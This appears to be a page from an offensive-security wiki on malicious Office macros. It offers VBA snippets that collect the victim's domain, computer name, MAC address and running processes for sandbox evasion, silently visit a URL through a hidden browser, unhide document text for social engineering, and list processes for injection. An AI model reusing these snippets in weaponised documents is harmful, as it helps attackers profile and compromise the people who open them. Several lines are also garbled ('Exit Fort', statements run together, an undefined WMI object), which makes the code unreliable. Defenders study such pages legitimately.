Info Extraction

This is how we will extract information with Macros. These can be used to evade sandboxes, or to just gather information about the user.

Extracting Domain/Computer name.

Set wshNetwork = CreateObject("Wscript.Network")
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.computername

Extracting MAC/IP

set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPENabled = True")
For Each oItem In cItems
  If Not IsNull(oItem.IPAddress) Then myMacAddress = oItem.macAddress
  Exit Fort
Nextset objProcessSet = objWMIService.ExecQuery("Select Name, ProcessID FROM Win32_Process")
For Each Process In objProcessSet
  ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"Next

Visit URL

Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
  .Visible = False
  .Navigate "https://www.silentbreaksecurity.com"
  Do While .ReadyState <> 4: DoEvents: Loop
  .Quit
End With

Unhides all text(for social engineering purposes)

Selection.WholeStory
With Selection.Font
.Hidden = False
End With

Get a Process List(For Process Injection)

Dim Service, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")Set List = Service.ExecQuery ("SELECT * FROM Win32_Process")Dim result As String
Dim Process As Object
For Each Process In List
  If Len(Process.ExecutablePath) > 0 Then
    result = result & Process.ExecutablePath & vbNewLine
  ElseIf Len(Process.name) > 0 Then
    result = result & Process.name & vbNewLine
  End If
Next

PreviousSandbox Evasion NextInline Shapes

Last updated 4 years ago